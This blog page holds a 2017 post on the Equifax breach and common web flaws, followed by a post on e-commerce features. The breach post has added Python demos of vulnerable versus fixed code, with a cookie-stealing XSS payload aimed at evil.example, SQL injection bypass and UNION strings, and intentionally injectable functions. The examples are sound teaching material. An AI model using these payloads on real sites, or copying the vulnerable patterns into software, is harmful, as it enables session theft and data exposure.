Tuesday, September 12, 2017

Equifax Breach Shines Light on Common Web Vulnerabilities

If you’ve been living off the grid or hunkered down to avoid the wrath of mother nature, you might have missed the big news from last week. Equifax, one of the three largest credit reporting agencies in the United States, reported a security breach of epic proportions.

The breach involved Personally Identifiable Information (PII) for roughly 143 million people in the US alone, close to one in every two people. The exposed data included names, birth dates, and addresses, but also extended to social security numbers, credit card numbers, and in some cases driver’s license numbers.

To exacerbate the problem, Equifax’s handling of the response and notification has left consumers and experts alike concerned about its ability to address the issue. In fact, the incident is so severe, and the management of it so questionable, that the House Financial Services Committee will be holding hearings to gain a better understanding of what this means to consumers and the country.

What might be the most damning, however, is how the breach occurred. Early reports pointed to Equifax having fallen to one of the most common security vulnerabilities known, a SQL injection. Equifax itself subsequently attributed the intrusion to an unpatched vulnerability in the Apache Struts web framework (CVE-2017-5638), a flaw for which a fix had been available for months. Either way, the lesson is the same: this was a well-known class of weakness, not a novel attack.

Yet, while a company entrusted with the wealth of personal information that Equifax had stored on consumers should have taken greater precautions, hacks like these are called common for a reason. Many companies fall prey to them. Others don’t even know they should be testing for them. And still more rely on a single point of failure – a developer – to be the one to hold back the tide of hackers trying to get at your company’s data.

So, what are the most common web vulnerabilities your company should be looking for? And how do you effectively, and consistently, ensure the security of your data?

Top 5 Common Web Vulnerabilities

While not a complete list, these are some of the most common, and therefore most frequently exploited, vulnerabilities in web applications.

Authentication Issues and Session Management

HTTP is stateless and provides no built-in session tracking, so recognizing a logged-in user across requests must be handled by the web application, almost always with a session identifier stored in a cookie. That identifier is as good as the user’s password for as long as the session lives, so developers must be vigilant about how it is generated and handled: it must be unpredictable (drawn from a cryptographically secure random source), sent only over TLS and marked Secure and HttpOnly so it cannot be sniffed or read by injected script, regenerated at login so a value planted before authentication (session fixation) never becomes an authenticated session, and expired on logout and after a period of inactivity. Otherwise an attacker who obtains the identifier can hijack the user’s session while it is still active.

Cross-site Request Forgery

In a cross-site request forgery (CSRF), a malicious third-party site causes the victim’s browser to send a request to a web application the user is already logged in to. Because the browser automatically attaches that application’s cookies, the request arrives carrying the user’s session and looks legitimate to the server. Typical targets are social media sites, financial institutions (banks, credit card sites), and webmail. If the application cannot tell a forged request from a genuine one, the attacker can trigger actions in the user’s name, such as transferring money or changing the account’s email address. The standard defense is a secret token, tied to the session, that must accompany every state-changing request; the SameSite cookie attribute adds a second layer by keeping the browser from attaching cookies to most cross-site requests in the first place.
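The two preceding sections describe the same machinery from two sides: a session cookie that must be unguessable, rotated at login and protected by cookie attributes, and a CSRF token bound to that session that a forged cross-site form cannot supply. The following is an added example, not code from the original post or from any framework; it is a self-contained Python model of both, with an in-memory session store and a hypothetical `handle_transfer` endpoint standing in for a real application. The server key, the 15-minute idle timeout and the user names are assumptions chosen for the demonstration.

```python
import hashlib
import hmac
import secrets
import time

# Assumption: in a real deployment this key comes from a secrets manager;
# here it is generated per process so the example runs stand-alone.
SERVER_KEY = secrets.token_bytes(32)
SESSION_TTL = 15 * 60  # idle timeout in seconds (assumed value)


class SessionStore:
    """In-memory session store keyed by an unguessable session ID."""

    def __init__(self):
        self._sessions = {}

    def create(self, user=None):
        sid = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG, not a counter
        self._sessions[sid] = {"user": user, "expires": time.time() + SESSION_TTL}
        return sid

    def get(self, sid):
        s = self._sessions.get(sid)
        if s is None:
            return None
        if s["expires"] < time.time():  # idle timeout: drop the session
            del self._sessions[sid]
            return None
        s["expires"] = time.time() + SESSION_TTL  # sliding expiry on activity
        return s

    def login(self, old_sid, user):
        """Rotate the ID at authentication so an ID planted before login
        (session fixation) never turns into an authenticated session."""
        self._sessions.pop(old_sid, None)
        return self.create(user)

    def logout(self, sid):
        self._sessions.pop(sid, None)


def session_cookie(sid):
    """Set-Cookie value: HTTPS only, hidden from scripts, not sent cross-site."""
    return (f"sid={sid}; Path=/; Max-Age={SESSION_TTL}; "
            "Secure; HttpOnly; SameSite=Lax")


def csrf_token(sid):
    """Token derived from the session ID; a third-party page cannot read it."""
    return hmac.new(SERVER_KEY, sid.encode(), hashlib.sha256).hexdigest()


def csrf_ok(sid, presented):
    # compare_digest avoids leaking the token byte by byte through timing.
    return bool(presented) and hmac.compare_digest(csrf_token(sid), presented)


def handle_transfer(store, cookies, form):
    """Hypothetical state-changing endpoint: needs a live, authenticated
    session AND a CSRF token that matches it. Returns (status, message)."""
    sess = store.get(cookies.get("sid", ""))
    if sess is None or sess["user"] is None:
        return 401, "not authenticated"
    if not csrf_ok(cookies["sid"], form.get("csrf")):
        return 403, "missing or invalid CSRF token"
    return 200, f"transferred {form['amount']} for {sess['user']}"


def demo():
    store = SessionStore()
    anon = store.create()             # ID handed out before login
    sid = store.login(anon, "alice")  # rotated at login; old ID is dead
    assert store.get(anon) is None
    # Legitimate submission: the form our page rendered carried the token.
    good = handle_transfer(store, {"sid": sid},
                           {"amount": "10", "csrf": csrf_token(sid)})
    # Forged request from another origin: the browser still attaches the
    # cookie, but the attacker cannot read our page, so the token is wrong.
    forged = handle_transfer(store, {"sid": sid},
                             {"amount": "9999", "csrf": "0" * 64})
    return good, forged


if __name__ == "__main__":
    print(demo())
```

Note what the example does not do: it never derives the session ID from anything predictable, never keeps a pre-login ID after authentication, and never trusts the cookie alone for a state change. With `SameSite=Lax` the forged POST would not even carry the cookie in modern browsers, but the token check is what protects the users whose browsers ignore the attribute.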

Security Misconfigurations

With the number of components that make up a web application ecosystem, it’s important that users and processes have only the minimum access they need to get their intended tasks done. Unfortunately, either through a lack of training or through systems that grant access to more data than is needed, processes and accounts may be able to see data or perform actions that they should not have access to. Because of this, a malevolent user, or an attacker who compromises a user or process account, can perform harmful actions that a correctly scoped account could never have reached: a web application’s database account that can read every table, for example, turns a small flaw in one page into a full data export.

XSS – Cross-Site Scripting

Handling user-submitted data correctly is an important part of the security of your application. In a cross-site scripting attack, an attacker gets client-side script into a page that other users view, either by reflecting it straight back from a request parameter or by storing it (in a comment, a profile field) so the site serves it later. Any page that is dynamically generated from user-supplied data is at risk if that data is placed into the HTML without being encoded for the context it lands in. Because the injected script runs with the origin of the site, it can read the page, make requests as the user, redirect the user to a malicious site that looks like the original, or hijack the user’s session.
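The two failure modes the paragraph names, script injection and redirection to a look-alike site, come from two different mistakes, and the fixes differ: output encoding for the markup, and a strict check of the destination for redirects. The following is an added example, not code from the original post; the page fragments, the `evil.example` host and the payloads are constructed for the demonstration, and the only library used is Python’s standard `html` module.

```python
import html
from urllib.parse import urlsplit


def render_vulnerable(name):
    # Raw interpolation: whatever the user typed is parsed as markup.
    return f"<p>Hello, {name}!</p>"


def render_escaped(name):
    # HTML text context: <, >, &, and quotes become entities and stay text.
    return f"<p>Hello, {html.escape(name)}!</p>"


def render_attribute(value):
    # Attribute context: quote the attribute AND escape quotes inside it,
    # otherwise a stray " lets the input start a new attribute (onfocus=...).
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def safe_redirect(target, default="/"):
    """Only follow same-site, path-only targets. Rejects absolute URLs,
    protocol-relative '//evil', javascript: URIs and backslash tricks."""
    parts = urlsplit(target)
    if (parts.scheme or parts.netloc or "\\" in target
            or not target.startswith("/") or target.startswith("//")):
        return default
    return target


# Constructed attacker inputs.
PAYLOAD = ('<script>document.location="https://evil.example/?c="'
           '+document.cookie</script>')
ATTR_PAYLOAD = '" onfocus="alert(1)" autofocus="'


def demo():
    return {
        "vulnerable": render_vulnerable(PAYLOAD),
        "escaped": render_escaped(PAYLOAD),
        "attribute": render_attribute(ATTR_PAYLOAD),
        "redirect_ok": safe_redirect("/account/settings"),
        "redirect_absolute": safe_redirect("https://evil.example/login"),
        "redirect_protocol_relative": safe_redirect("//evil.example"),
        "redirect_javascript": safe_redirect("javascript:alert(1)"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The important design point is that encoding depends on where the value lands: `html.escape` is right for element text and quoted attributes, but not for a value dropped inside a `<script>` block or a URL, where a different encoder (or, better, refusing to interpolate at all) is needed. Input validation helps, but a name field that legitimately allows an apostrophe cannot be validated into safety; output encoding is what actually neutralizes the payload.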

SQL Injections

Early reports suggested that a SQL injection was what was used in the Equifax breach, although Equifax later attributed the intrusion to an unpatched Apache Struts vulnerability. Like cross-site scripting, SQL injection occurs when data coming into the site is treated as code: user-supplied input is concatenated into a query string, so a crafted value can change the query’s meaning and pass arbitrary SQL commands to the database, from bypassing a login check to reading every table the application’s account can see. Input validation narrows the attack surface, but the real fix is to keep data and query separate by using parameterized (prepared) statements, so that input is bound as a value and never parsed as SQL. Equifax isn’t the only large company that has been linked to a SQL injection attack; the 2011 breach of Sony’s PlayStation Network was also widely reported to involve SQL injection.
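To make the distinction concrete, the following added example (not code from the original post) builds a small SQLite database in memory and runs the same two attacks, an authentication bypass and a UNION-based data extraction, against a login and a search function written with string concatenation and then against their parameterized equivalents. The table, the two accounts and the payloads are constructed for the demonstration; passwords are stored in plaintext only to keep the example short.

```python
import sqlite3


def make_db():
    """Constructed sample database: two accounts with a sensitive column."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password TEXT, ssn TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password, ssn) VALUES (?, ?, ?)",
        [("alice", "s3cret", "123-45-6789"), ("bob", "hunter2", "987-65-4321")])
    return conn


def login_vulnerable(conn, username, password):
    # String concatenation: the input becomes part of the SQL grammar.
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    # Parameterized query: the driver binds the values; they are never parsed.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def search_vulnerable(conn, prefix):
    sql = f"SELECT username FROM users WHERE username LIKE '{prefix}%'"
    return [r[0] for r in conn.execute(sql).fetchall()]


def search_safe(conn, prefix):
    sql = "SELECT username FROM users WHERE username LIKE ?"
    return [r[0] for r in conn.execute(sql, (prefix + "%",)).fetchall()]


# Constructed attacker inputs.
BYPASS = "' OR '1'='1"                     # turns the WHERE clause always-true
EXFIL = "' UNION SELECT ssn FROM users --"  # appends a query on another column


def demo():
    conn = make_db()
    return {
        # Vulnerable login: password check becomes (... AND password='') OR 1=1
        "vuln_bypass": login_vulnerable(conn, "alice", BYPASS),
        "safe_bypass": login_safe(conn, "alice", BYPASS),
        # Vulnerable search: the username listing now returns SSNs instead.
        "vuln_exfil": search_vulnerable(conn, EXFIL),
        "safe_exfil": search_safe(conn, EXFIL),
        "legit": login_safe(conn, "bob", "hunter2"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The safe variants need no payload blacklist: the bypass string is simply a password nobody has, and the UNION string is simply a username prefix nobody matches. Least privilege belongs alongside this fix, since a database account that can only read the `username` column would have left the UNION query nothing to extract even in the vulnerable version.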

Strategies for Protecting Your Data from Common Web-based Threats

The good news is that most of the common attacks are well understood and can be addressed with education, testing, and consistency.

Developers, system administrators, and security staff should be well-trained to be aware of best practice for web application security. Knowing when encryption should be used on data, and how to minimize exposure to data through access control, can reduce system exposure to outside entities.

Education can also ensure that injected scripts or malicious SQL passed through web application form elements never reach the page or the database as code. When developers are taught to constrain form inputs, validate data, encode output, and use parameterized queries, those attack vectors are largely closed off.

But the entire burden shouldn’t be placed on the shoulders of the developers. Application testing should include boundary testing, in other words, testing beyond the expected use of an application with malformed, oversized, and hostile input, which can identify areas of potential vulnerability before an attacker does.

Beyond the areas of education and standards, though, regular full site testing can be invaluable. Penetration testing on applications that have access to sensitive data can inform improvements that need to be performed to secure your site. While internal teams can perform regular penetration tests, periodic testing and security audits by an outside partner can provide invaluable insights that might otherwise be overlooked.

Simple oversights in web application security can have devastating results, as the Equifax breach has shown. A common vulnerability can be easily exploited by hackers and have life-altering effects on millions. But even if your company doesn’t deal with the same level of sensitive data, you have a responsibility to your users and the enterprise to protect the data stored on your systems. Vigilance, education, and awareness are the greatest tools at your disposal to protect your organization from outside attacks.


The post Equifax Breach Shines Light on Common Web Vulnerabilities originally appeared on the Curotec Blog

Thursday, September 7, 2017

4 E-Commerce Features You Didn’t Know You Needed

E-commerce continues to grow at a rapid pace. If you’re thinking about starting an online storefront or adding the ability to purchase your products online in addition to a brick and mortar store, you’ve probably already considered some of the most common features that you’ll need.

Some of these features may include an easy way to add new products, the ability to quickly set up your storefront, the ability to set up sales and specials, store analytics, and integrations with payment providers.

But there are features that you may not be considering that can be just as important as the ability to import your products. Below we’ve called out 4 e-commerce features that you may not have thought of, but that can take your business to the next level.


An Extensible E-commerce Platform

When you first set up your e-commerce site, it may seem like the platform you’ve chosen has everything you’ll ever need. But you should take a step back and review what your company might need in the future, or at the very least understand that what you need today might not be what your customers will demand from you tomorrow.

Since it’s unlikely that you have a crystal ball to know what that might be, your insurance against your needs outgrowing your platform is to choose one that is extensible.

What does that mean? It means that you’ll be able to add functionality to your platform without having to bring in an expert to make significant changes to the core of your e-commerce platform. This not only allows you to add functionality as it becomes relevant, such as fraud protection, mentioned below, and customer service software, it also allows you to respond to your market as the needs of your customer base change. Additionally, it can allow you to amp up the security on your site by adding new innovations as they become available.


Open Source E-commerce Implementation

While having a site that is extensible means you can add pre-built components to grow your business and your platform’s functionality, choosing an open source e-commerce solution means that you can make your storefront into anything you want, with a little help from a knowledgeable technology partner.

Because open source software provides the code that makes up the platform’s functionality available, a skilled technology partner can help you change or add functionality to your storefront that may not exist otherwise. If you’ll need specialized functions to make your storefront the best it can be, going open source can be the most robust means of ensuring you get exactly what you want.

Remember, though – open source may not mean free. Some companies still charge for their platform, but once you are a licensed user you have access to the underlying code.


Integration with Fraud Protection

Payment processing is a no brainer for an e-commerce site. But with e-commerce fraud on the rise – fraud rates in 2016 were 33% higher than those a year earlier – you need to consider protecting those purchases as much as being able to accept them.

E-commerce sites typically ask for the Card Verification Value (CVV), the short code printed on the card, as a step toward ensuring a transaction is valid. But CVV verification only confirms that whoever is entering the details has the code printed on the card; it does nothing against card data that was stolen along with the code, so it is only a first step toward fraud prevention.

Outside services, like ClearSale, provide modules that can be used with various e-commerce platforms to help verify the validity of a charge and to score the likelihood that a particular transaction will be charged back, including chargebacks raised by the legitimate cardholder, something known as “friendly fraud”.


Ability to Connect to a 3PL

As your business grows, your ability to manage inventory, order fulfillment, and shipping alongside the rest of your business will diminish. It’s at this point that many e-commerce retailers look to 3PLs for assistance with their inventory and order fulfillment needs.

A 3PL – or third-party logistics provider – can manage these elements of your business for you, providing you with benefits like reduced shipping time and cost, updated and streamlined warehouse procedures, and inventory adaptation and management based on demand.

However, adding a 3PL to your online retail business will provide far fewer benefits if orders still have to be re-keyed or managed by hand. Instead, a direct integration with your 3PL allows orders coming in from your website to flow seamlessly into your third-party logistics provider’s fulfillment systems.

If you’re just starting out in the online retail space, some of these concerns may seem far-reaching. But as your business grows, you’ll be glad you took the time to plan for expansion. Overhauling your e-commerce site shortly after setting it up is a frustrating experience, and one that can be avoided when you consider a few additional features that will free you to grow and build your business.


The post 4 E-Commerce Features You Didn’t Know You Needed originally appeared on the Curotec Blog
